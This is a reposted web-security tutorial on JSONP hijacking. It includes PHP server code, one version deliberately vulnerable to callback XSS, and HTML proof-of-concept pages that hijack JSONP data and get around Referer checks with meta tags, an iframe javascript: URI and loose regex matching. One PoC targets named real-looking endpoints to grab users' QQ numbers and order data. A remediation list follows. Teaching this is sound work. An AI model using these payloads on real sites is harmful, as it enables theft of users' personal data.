Talking about JSONP Hijacking Vulnerability

最新推荐文章于 2023-12-08 13:22:37 发布
最新推荐文章于 2023-12-08 13:22:37 发布
阅读量94 收藏
点赞数
文章标签: android java spring 开发语言 数据库 spring boot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65876116/article/details/131872669
版权

 Source:- https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.htmlicon-default.png?t=N6B9https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.html

​​​​​​​​

JSONP

The full name of JSONP is JSON with Padding, a solution based on JSON format to solve cross-domain request resources.

Due to the limitation of the browser's same-origin policy, the browser only allows XmlHttpRequest to request resources with the same current (domain name, protocol, port), and there is no restriction on requesting script resources.

Principle: The client sends a cross-domain request through the request script tag, and then the server outputs JSON data and executes the callback function. This cross-domain data output method is called JSONP. Simple principle description: use <script></script>

Hazards that can be caused

  • JSONP data hijacking
  • callback xss caused by no filtering

JSONP Hijacking Example

COPY

# Server request address: http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback
<?php
header('Content-type: application/json');
$callback = htmlspecialchars($_REQUEST['callback']);
if (!isset($callback) || empty($callback)) {
    $callback = 'callback';
}
$data = array('username'=>'Pmeow-phpoop','email' => '3303003493@google.com');
$json = json_encode($data);
echo $callback."(".$json.")";

COPY

# Client request address: http://127.0.0.1/jsonp/jsonp_test.html
<!DOCTYPE html>
<html lang='en'>
<head>
    <title>jsonp</title>
</head>
<body>
    jsonp hijack test
</body>
    <script>
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</html>

JSONP hijacking bypass method

Referer filtering (regular) is not rigorous

for example http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback When outputting data, the Referer is verified

But unfortunately, it only verifies whether the keyword aphp. test exists in the Referer.

Then the attacker can construct the url: http://127.0.0.1/aphp.test.html or http://127.0.0.1/attack.htm?aphp.test

Construct such a url to launch an attack to bypass the Referer defense

Empty Referer bypass

Sometimes developers will allow the Referer source to be empty when filtering because under normal circumstances, the browser directly accesses a URL without a Referer, so we can sometimes use this feature to bypass

COPY

# Use the <meta> tag to implement an empty Referer
<!DOCTYPE html>
<html lang='en'>
<head>
    <meta name="referrer" content="never" charset="utf-8">
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
</body>
    <script>
        function jsonCallback(data){
            alert(JSON.stringify(data));
        }
    </script>
    <script src="http://aphp.test/jsonp/test_jsonp.php?callback=jsonCallback"></script>
</html>

COPY

# Use the <iframe> tag to call the javscript pseudo-protocol to implement an empty Referer call JSON file
<!DOCTYPE html>
<html lang='en'>
<head>
    <title>jsonp without Referer</title>
</head>
<body>
    jsonp without Referer hijacking test
</body>
    <iframe src="javascript:'<script>function jsonCallback(data){alert(JSON.stringify(data));}</script> <script src=http://aphp.test/jsonp/test_jsonp.php? callback=jsonCallback></script>'" frameborder="0"></iframe>
</html>

The callback can define the security problem caused

In general development, the front-end can be easily called, and the general output Callback is customizable, which leads to xss if the filtering is not strict, or if the Content-Type is not set properly

​​​​​​​

 Source:- https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.htmlicon-default.png?t=N6B9https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.html

Note: Strictly speaking, if the output data is also controllable by the attacker, it may also cause harm, but this article emphasizes the output point of Callback

Test a piece of code as follows​​​​​​​​

<?php
$callback = $_REQUEST['callback'];
if (!isset($callback) || empty($callback)) {
    $callback = 'callback';
}
$data = array('username'=>'Pmeow-phpoop','email' => '3303003493@google.com');
$json = json_encode($data);
echo $callback."(".$json.")";

Test Html code

COPY

<!DOCTYPE html>
<html lang='en'>

<head>
    <meta name="referrer" content="never" charset="utf-8">
    <title>jsonp hijack</title>
</head>

<body>
    https://v.qq.com jsonp hijacking
</body>
    <!-- Hijacking the user's QQ number can be used for promotion -->
    <script>function jc(data){alert(JSON.stringify(data));}</script>
    <script src="http://node.video.google.com/x/api/get_2029?callback=jc&_=1542534620161"></script>

    <!-- Hijack the user's order data -->
    <script>function jc2(data){alert(JSON.stringify(data));}</script>
    <script src="http://like.video.google.com/fcgi-bin/flw_new?otype=json&sn=FollowServer&cmd=2562&pidx=0&size=30&dtype=0&type=0&callback=jc2&_=1542536629083"></script>
</html>

JSONP Remediation

  • Verify HTTP Referer header information.
  • Add csrfToken to the request and validate it on the backend.
  • Standard output in JSON format, Content-Type is set to (Content-Type : application/json; charset=utf-8).
  • Strictly filter the callback function name and the output of data in JSON (prevent xss)

Source:- https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.htmlicon-default.png?t=N6B9https://tutorialboy24.blogspot.com/2023/07/talking-about-jsonp-hijacking.html

 

tutorialboy24
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSONP存在的JSON Hijacking漏洞以及与csrf/xss漏洞的关系
Meditation
01-28 8917
在实习过程中接触过所谓的JSON Hijacking 漏洞,但最近在写论文时发现理解得不深,好像跟xss与csrf又有点区别与联系,索 性深入学习了下JSONP。 下面一段话截取自:http://stackoverflow.com/questions/2067472/what-is-jsonp-all-about 举例
jsonp
01-08
JSONP,全称为“JSON with Padding”,是一种在JavaScript中实现跨域数据交互的常见方法。由于浏览器的安全策略——同源策略,JavaScript通常被限制只能访问与当前页面同源(同协议、同域名、同端口)的资源。而...
从Ajax聊一聊Jsonp hijacking
Sp4rkW的博客
01-31 6946
前言 偶然看到freebuf去年的一篇文章,JSONP注入解析 ,看完整篇文章并没有太理解其提到的JSONP,仔细查阅了相关资料,在这里将所得与大家分享~ 从Ajax谈起 先提两个众所周知的概念: Ajax,Asynchronous JavaScript and XML,意思就是用JavaScript执行异步网络请求。 Web的运作原理:一次HTTP请求对应一个页面。 那么问题来...
jsonp请求拦截
一位不知名小前端的一些笔记
10-17 1097
前言: 最近遇到的一个问题,可以通过拦截修改jsonp请求去解决;搜了下关键字“拦截jsonp请求”,没有找到想要的答案,都是搜到一些跨域的文章…所以自己实现记录了下,希望帮助到正在搜的伙伴。 思路 理解jsonp原理的话,实现起来很简单,就直接贴代码啦(监听dom创建,识别script标签,修改src) 代码 (function () { var originalCreateElement = document.createElement function changeReqLink (scr
[前端原生技术]jsonp
最新发布
进步*于辰的博客
12-08 1万+
什么是JsonpJsonp的用途是什么?可以说Jsonp让我对前端的底层逻辑有了另一种思维,本篇文章是我为此作的笔记, 如果文中阐述不全或不对的,多多交流。
jsonp原理及使用
10-26
JSONP,全称为JSON with Padding,是一种解决浏览器同源策略限制的技巧,允许网页通过JavaScript从其他域名下获取数据。由于浏览器的安全策略,通常JavaScript不能跨域请求数据,但JSONP巧妙地利用了`<script>`标签...
JSONP之我见
12-12
JSONP: 本地html文件要获取xxx网站(跨域)数据时使用的方法。 跨域问题: 外部服务器的数据只能用外部服务器中的js访问,本地js无法用XMLHttpRequest()访问。 外部服务器中的Web服务提供JSON数据,比如在...
JSONP 原理
01-08
JSONP(JSON with Padding)是一种跨域数据交互协议,它利用了浏览器的同源策略限制的一个漏洞,使得JavaScript可以从不同的源获取数据。由于浏览器的安全策略,JavaScript通常不能跨域访问资源,但JSONP通过动态...
jQuery 发送一个 jsonp 请求
01-08
jQuery 发送一个 jsonp 请求 jQuery 也提供给我们发送 jsonp 请求的方式 1. jsonp: 利用 script 标签的 src 属性来请求 2. 返回值: 是一个字符串, 字符串里面写了一个 函数名(后端传递给前端的参数) 使用 $.ajax() ...
JavaScript中模拟实现jsonp
10-24
主要介绍了JavaScript中模拟实现jsonp,本文直接给出实现代码,代码中包含详细注释,需要的朋友可以参考下
JQuery jsonp 使用示例代码
12-11
JSONP(JSON with Padding)是一种跨域数据交互协议,它利用了`<script>`标签可以跨域请求资源的特性,将JSON数据包裹在一个JavaScript函数调用中返回,从而实现跨域获取数据的目的。在jQuery中,JSONP是通过`$.ajax...
使用jsonp完美解决跨域问题
12-12
处理手段:使用jsonp格式, ajax请求参数dataType:’JSONP’。 代码如下: $.ajax({  url: “http://…….”,  type: ‘GET’,  dataType: ‘JSONP’,//here  success: function (data) {  
浅析JSONP技术原理及实现
10-22
主要介绍了浅析JSONP技术原理及实现 的相关资料,非常不错具有参考借鉴价值,需要的朋友可以参考下
封装好的jsonp.js
02-20
封装好的jsonp.js
jQuery Jsonp跨域模拟搜索引擎
10-19
主要介绍了jQuery Jsonp跨域模拟搜索引擎的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
jsonp跨域请求实现示例
10-20
本文主要介绍了jsonp跨域请求实现示例。具有很好的参考价值。下面跟着小编一起来看下吧
JSONP跨域请求
01-19
我们可以使用JSONP解决跨域问题。 一、JSONP是什么 JSONP(JSON with Padding)是JSON的一种“使用模式”,可用于解决主流浏览器的跨域数据访问的问题。由于同源策略,一般来说位于 server1.example.com 的网页js是...
Unigui服务端jsonp.rar
05-10
这个“Unigui服务端jsonp.rar”压缩包可能包含与使用Unigui在服务端实现JSONP相关的代码示例、教程或配置文件。 JSONP的核心概念是动态插入`<script>`标签,因为浏览器允许从任何源加载脚本。服务端会返回一个...
03_跨域与JSONP
06-21
跨域与JSONP 跨域与JSONPContents目录 了解同源策略和跨域 JSONP 案例 - 淘宝搜索 防抖和节流 1. 了解同源策略和跨域 1.1 同源策略 如果两个页面的协议,域名和端口都相同,则两个页面具有相同的源。同源策略是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值